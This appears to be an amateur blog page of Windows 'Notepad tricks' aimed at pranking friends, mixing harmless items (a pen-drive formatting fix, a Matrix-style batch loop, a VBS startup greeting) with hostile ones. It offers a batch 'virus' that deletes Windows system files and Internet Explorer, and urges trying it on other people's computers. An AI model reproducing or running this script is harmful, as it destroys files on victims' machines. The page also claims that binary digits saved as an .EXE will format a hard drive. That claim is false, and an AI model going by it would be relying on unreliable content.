Format your Friend's HARD DRIVE...!!!

Format your Friend's HARD DRIVE...!!!


Here, I'm giving trick to format any disk drive

...try on your own...!!!

Format the Hard Disk using Notepad:

1. Write The Following In Notepad Exactly as it says
2. Write the following code:01001011000111110010010101010101010000011111100000
3. Save As it as .EXE and any Name would Do.
4. If u run the program means it will format the Hard Drive.

Can't format Pen drive?

Can't format Pen drive?

1) Right click on My computer > Open Manage.
2) Select Disk management.
3) Right click on disk label (like J: etc..)
4) Change Drive letter and paths.....
5) Click on Remove.
6) Then format pen drive...
7) After that again Add Drive letter (J:)
Now your pen drive is safe formatted..

Make a Simple Virus.

Make a Simple Virus.


plz dont try on your pc...

it is simple .bet file....

@echo off
@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe
msg "WARNING:A VIRUS TOOK OVER YOUR COMPUTER VIRUS NOTICED AS:RINSE JOHN hacked your IP.exe"

Copy these lines in notepad and save it as "rinse.bat" or "rinse.exe"

Try this on any other computer..... Very heavy Virus..

Notepad Tricks: Matrix Falling Code Effect

Notepad Tricks: Cool Notepad tricks for Windows


Matrix Falling Code Effect - Notepad CMD (.BAT) Tricks
Inspired by the movie Matrix, this falling code trick is extremely popular on social networking websites. Copy and paste the code given below in Notepad and save the file as "Matrix.bat" or *.bat.

@echo off
color 02
:tricks
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto tricks

Notepad tricks
Matrix Falling Code Effect - Notepad Trick

Upon running the bat file, you will see the "Matrix falling code" effect.

Make your Computer Welcome You

Make your Computer Welcome You


With this trick, you can make your Computer welcome you in its computerized voice.
You can make your Windows based computer say "Welcome to your PC, Username."

Make Windows Greet you with a Custom Voice Message at Startup

To use this trick, follow the instructions given below:-

1.Click on Start. Navigate to All Programs, Accessories and Notepad.

2. Copy and paste the exact code given below.

Dim speaks, speech
speaks="Welcome to your PC, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks


3. Replace Username with your own name.

4. Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Welcome.vbs or "*.vbs".

5. Copy the saved file.

6. Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup (in Windows XP) and to C:\Users\ {User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 8, Windows 7 and Windows Vista) if C: is your System drive. AppData is a hidden folder. So, you will need to select showing hidden folders in Folder options to locate it.

7. Paste the file.

Make your Computer Welcome you at startup

Now when the next time you start your computer, Windows will welcome you in its own computerized voice.